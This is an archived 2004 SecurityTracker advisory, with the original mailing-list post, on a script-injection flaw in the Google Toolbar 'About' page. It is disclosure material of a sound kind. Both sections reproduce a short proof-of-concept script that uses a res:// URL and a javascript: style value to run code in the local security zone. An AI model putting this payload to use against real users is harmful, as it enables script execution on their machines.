SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Google Toolbar Vendors:  Google
Google Toolbar Input Validation Hole in 'About' Page Lets Local Users Execute Scripting Code
SecurityTracker Alert ID:  1011351
SecurityTracker URL:  http://securitytracker.com/id?1011351
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Sep 19 2004
Original Entry Date:  Sep 17 2004
Impact:  Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): Tested on 2.0.114.1-big/en (GGLD)
Description:  Viper reported an input validation vulnerability in the Google Toolbar. A local user can execute arbitrary scripting code.

It is reported that the 'About' section of the Google Toolbar does not properly filter HTML code. A user can create HTML that, when loaded by the target user, will invoke the About page and execute arbitrary scripting code in the context of the page.

A demonstration exploit is provided:

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s>

Rafel Ivgi subsequently reported that the 'res:' protocol cannot be invoked from the Internet zone, preventing this flaw from being directly exploitable by remote users.
Impact:  A user can cause scripting code to be executed in the Local Computer security zone.
Solution:  No solution was available at the time of this entry.
Vendor URL:  toolbar.google.com/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Windows (Any)
Reported By:  ViPeR <viper31337@yahoo.co.in>
Message History:   None.

 Source Message Contents
Date:  Fri, 17 Sep 2004 09:51:10 +0100 (BST)
From:  ViPeR <viper31337@yahoo.co.in>
Subject:  GoogleToolbar:About -- Allows Script Injection

 
 
Affection Software : GoogleToolbar
Version : Tested on 2.0.114.1-big/en (GGLD)
 
Notes:
GoogleToolbar's About section allows injection of
script, since it lacks any checking. The following
code is a Proof Of Concept.
 
<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>
 
rgds,
Gregory R. Panakkal / Viper
 
 
________________________________________________________________________
Yahoo! India Matrimony: Find your life partner online
Go to: http://yahoo.shaadi.com/india-matrimony


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC